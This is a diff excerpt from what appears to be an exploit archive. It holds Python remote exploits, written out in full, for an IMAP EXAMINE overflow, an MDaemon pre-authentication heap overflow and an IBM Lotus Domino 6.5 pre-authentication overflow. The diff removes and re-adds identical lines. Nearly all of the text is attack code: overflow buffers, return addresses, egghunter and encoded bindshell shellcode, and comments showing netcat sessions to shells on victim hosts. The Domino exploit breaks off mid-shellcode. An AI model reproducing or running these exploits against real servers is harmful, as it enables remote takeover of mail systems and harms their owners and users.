+print "[+] Logging in as %s" % sys.argv[3]
-s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
+s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
-data = s.recv(1024)
+data = s.recv(1024)
-print "[+] "+data.rstrip()
+print "[+] "+data.rstrip()
-print "[+] Sending evil buffer..."
+print "[+] Sending evil buffer..."
-s.send('A001 EXAMINE ' + buffer+'\r\n')
+s.send('A001 EXAMINE ' + buffer+'\r\n')
-s.close()
+s.close()
-print "[+] Done\n"
+print "[+] Done\n"
-print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"
+print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"
-
+
-# milw0rm.com [2005-12-19]
+# milw0rm.com [2005-12-19]
--- a/platforms/windows/remote/2258.py
+++ b/platforms/windows/remote/2258.py
@ -1,152 +1,152 @@
-#!/usr/bin/python
+#!/usr/bin/python
-import sys
+import sys
-import struct
+import struct
-import socket
+import socket
-from time import sleep
+from time import sleep
-########################################################################################
+########################################################################################
-# MDaemon Pre Authentication (USER) Heap Overflow 
+# MDaemon Pre Authentication (USER) Heap Overflow 
-# Code based on Leon Juranic's exploit
+# Code based on Leon Juranic's exploit
-# Coded by muts - mati@see-security.com
+# Coded by muts - mati@see-security.com
-# http://www.hackingdefined.com
+# http://www.hackingdefined.com
-# http://www.remote-exploit.org
+# http://www.remote-exploit.org
-# Tested on:
+# Tested on:
-# 	Mdaemon 9.0.5
+# 	Mdaemon 9.0.5
-# 	Mdaemon 7.2.3
+# 	Mdaemon 7.2.3
-# 	Mdaemon 7.2.2
+# 	Mdaemon 7.2.2
-# 	Mdaemon 7.2.1
+# 	Mdaemon 7.2.1
-# 	Mdaemon 7.2.0
+# 	Mdaemon 7.2.0
-#		Possibly Others
+#		Possibly Others
-#		PLEASE CONTINUE READING !
+#		PLEASE CONTINUE READING !
-# Huge greets to xbxice and talz for leading me away from the darkness
+# Huge greets to xbxice and talz for leading me away from the darkness
-########################################################################################
+########################################################################################
-# Mdaemon is wierd. It seems like their developers decided to annoy everyone
+# Mdaemon is wierd. It seems like their developers decided to annoy everyone
-# by making their software do unexpected things.
+# by making their software do unexpected things.
-# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
+# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
-# shellcode - which then scans the memory, and executes a bindshell on port 4444.
+# shellcode - which then scans the memory, and executes a bindshell on port 4444.
-# 
+# 
-# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
+# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
-# for which I unfortunately had no explenation. 
+# for which I unfortunately had no explenation. 
-# I later found out that these machines were fully patched ...
+# I later found out that these machines were fully patched ...
-# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to 
+# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to 
-# todays' version, I noticed that the SetunhandledExceptionFilter function had changed, 
+# todays' version, I noticed that the SetunhandledExceptionFilter function had changed, 
-# and looks suspiciously similar to XP SP2... 
+# and looks suspiciously similar to XP SP2... 
-# Note that my unpatched win2k was last patched 2-3 weeks ago, 
+# Note that my unpatched win2k was last patched 2-3 weeks ago, 
-# so I suspect this change is recent.
+# so I suspect this change is recent.
-# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
+# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
-#
+#
-# So, this is a partially working exploit, on unpatched win2k boxes....
+# So, this is a partially working exploit, on unpatched win2k boxes....
-# Kiddies, treat this exploit as DOS :)
+# Kiddies, treat this exploit as DOS :)
-#
+#
-# I got 3 types of results with this code:
+# I got 3 types of results with this code:
-#
+#
-# 1. Shell :)	
+# 1. Shell :)	
-# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
+# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
-# 3. Plain ugly crash - oh well.
+# 3. Plain ugly crash - oh well.
-#
+#
-# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
+# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
-######################################################################################## 
+######################################################################################## 
-# 
+# 
-# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
+# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
-# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
+# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
-# Microsoft Windows 2000 [Version 5.00.2195]
+# Microsoft Windows 2000 [Version 5.00.2195]
-# (C) Copyright 1985-2000 Microsoft Corp.
+# (C) Copyright 1985-2000 Microsoft Corp.
-# 
+# 
-# C:\MDaemon\APP>
+# C:\MDaemon\APP>
-########################################################################################
+########################################################################################
-
+
-host="192.168.220.128"
+host="192.168.220.128"
-
+
-ret = struct.pack("<L",0x7c2f62b6)	# 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
+ret = struct.pack("<L",0x7c2f62b6)	# 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
-ueh = struct.pack("<L",0x7C54144C)	# SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
+ueh = struct.pack("<L",0x7C54144C)	# SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
-tap = struct.pack("<L",0xeb169090)  	# Short Jump over some garbage
+tap = struct.pack("<L",0xeb169090)  	# Short Jump over some garbage
-
+
-# skape's egghunter shellcode 
+# skape's egghunter shellcode 
-
+
-egghunter  ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
+egghunter  ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
-egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
+egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
-egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8"
+egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8"
-egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"
+egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"
-
+
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
-
+
-shellcode  ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
+shellcode  ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
-shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
+shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
-shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
+shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
-shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57"
+shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57"
-shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
+shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
-shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
+shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
-shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
+shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
-shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38"
+shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38"
-shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
+shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
-shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
+shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
-shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d"
+shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d"
-shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38"
+shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38"
-shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46"
+shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46"
-shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
+shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
-shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57"
+shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57"
-shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
+shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
-shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
+shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
-shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50"
+shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50"
-shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
+shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
-shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34"
+shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34"
-shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51"
+shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51"
-shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
+shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
-shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
+shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
-shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42"
+shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42"
-shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
+shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
-shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d"
+shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d"
-shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
+shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
-shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
+shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
-shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46"
+shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46"
-shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c"
+shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c"
-shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
+shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
-shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42"
+shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42"
-shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
+shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
-shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
+shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
-shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56"
+shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56"
-shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
+shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
-shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
+shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
-shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f"
+shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f"
-shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
+shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
-shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
+shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
-shellcode +="\x4f\x4f\x42\x4d\x5a"
+shellcode +="\x4f\x4f\x42\x4d\x5a"
-
+
-buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346
+buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346
-
+
-for x in range(5):
+for x in range(5):
-	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-	s.connect((host,110))
+	s.connect((host,110))
-	data=s.recv(1024)
+	data=s.recv(1024)
-	print data
+	print data
-	s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n') 
+	s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n') 
-	s.send('QUIT\r\n')
+	s.send('QUIT\r\n')
-	s.close()
+	s.close()
-	sleep(1)
+	sleep(1)
-
+
-s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-s.connect((host,110))
+s.connect((host,110))
-data=s.recv(1024)
+data=s.recv(1024)
-print data
+print data
-s.send('USER ' + '@A@A'+ buffer + '\r\n')
+s.send('USER ' + '@A@A'+ buffer + '\r\n')
-data=s.recv(1024)
+data=s.recv(1024)
-print data
+print data
-s.send('USER ' + 'A' * 3370 + '\r\n')
+s.send('USER ' + 'A' * 3370 + '\r\n')
-s.close()
+s.close()
-
+
-s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-s.connect((host,110))
+s.connect((host,110))
-data=s.recv(1024)
+data=s.recv(1024)
-print data
+print data
-s.send('USER ' + '@A@A'+ buffer + '\r\n')
+s.send('USER ' + '@A@A'+ buffer + '\r\n')
-data=s.recv(1024)
+data=s.recv(1024)
-print data
+print data
-s.send('USER ' + 'A' * 3370 + '\r\n')
+s.send('USER ' + 'A' * 3370 + '\r\n')
-s.close()
+s.close()
-sleep(1)
+sleep(1)
-
+
-# milw0rm.com [2006-08-26]
+# milw0rm.com [2006-08-26]
--- a/platforms/windows/remote/3616.py
+++ b/platforms/windows/remote/3616.py
@ -1,145 +1,145 @@
-#!/usr/bin/python
+#!/usr/bin/python
-#
+#
-# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
+# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
-# Tested on windows 2003 server SP0. 
+# Tested on windows 2003 server SP0. 
-# Coded by Mati Aharoni
+# Coded by Mati Aharoni
-# muts@offensive-security.com
+# muts@offensive-security.com
-# http://www.offensive-security.com
+# http://www.offensive-security.com
-# Notes:
+# Notes:
-# * Not the the faint of heart.
+# * Not the the faint of heart.
-# * Iris, I love you
+# * Iris, I love you
-# Skeleton exploit shamelessly ripped off Winny Thomas
+# Skeleton exploit shamelessly ripped off Winny Thomas
-#
+#
-# bt ~ # ./domino 192.168.0.38
+# bt ~ # ./domino 192.168.0.38
-# [*] IBM Lotus Domino Server 6.5 Remote Exploit
+# [*] IBM Lotus Domino Server 6.5 Remote Exploit
-# [*] muts {-at-} offensive-security.com
+# [*] muts {-at-} offensive-security.com
-#
+#
-# [*] Sending bindshell *somewhere* into memory
+# [*] Sending bindshell *somewhere* into memory
-# [*] Sending bindshell *somewhere* into memory
+# [*] Sending bindshell *somewhere* into memory
-# [*] Sending bindshell *somewhere* into memory
+# [*] Sending bindshell *somewhere* into memory
-# [*] Sending bindshell *somewhere* into memory
+# [*] Sending bindshell *somewhere* into memory
-# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
+# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
-#
+#
-# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
+# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
-#
+#
-# [*] Triggering overwrite, ph33r.
+# [*] Triggering overwrite, ph33r.
-# [*] You may need to wait up to 2 minutes
+# [*] You may need to wait up to 2 minutes
-# [*] for egghunter to find da shell.
+# [*] for egghunter to find da shell.
-# bt ~ # date
+# bt ~ # date
-# Sat Mar 31 11:47:07 GMT 2007
+# Sat Mar 31 11:47:07 GMT 2007
-# bt ~ # nc -v 192.168.0.38 4444
+# bt ~ # nc -v 192.168.0.38 4444
-# 192.168.0.38: inverse host lookup failed: Unknown host
+# 192.168.0.38: inverse host lookup failed: Unknown host
-# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
+# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
-# Microsoft Windows [Version 5.2.3790]
+# Microsoft Windows [Version 5.2.3790]
-# (C) Copyright 1985-2003 Microsoft Corp.
+# (C) Copyright 1985-2003 Microsoft Corp.
-#
+#
-#C:\Lotus\Domino>
+#C:\Lotus\Domino>
-
+
-
+
-import sys
+import sys
-import md5
+import md5
-import struct
+import struct
-import base64
+import base64
-import socket
+import socket
-
+
-def sendbind(target):
+def sendbind(target):
-	bindshell ="\x90"* 400  # Metasploit bind shell port 4444
+	bindshell ="\x90"* 400  # Metasploit bind shell port 4444
-	bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57" 
+	bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57" 
-	bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+	bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-	"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+	"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-	"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+	"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-	"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+	"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-	"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+	"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
- 	"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
+ 	"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
-	"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
+	"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
-	"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
+	"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
-	"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
+	"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
-	"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
+	"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
-	"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
+	"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
-	"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
+	"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
-	"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
+	"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
-	"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
+	"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
-	"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
+	"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
-	"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
+	"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
-	"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
+	"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
-	"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
+	"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
-	"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
+	"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
-	"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
+	"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
-	"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
+	"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
-	"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
+	"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
-	"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
+	"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
-	"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
+	"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
-	"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
+	"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
-	"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
+	"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
-	"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
+	"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
-	"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
+	"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
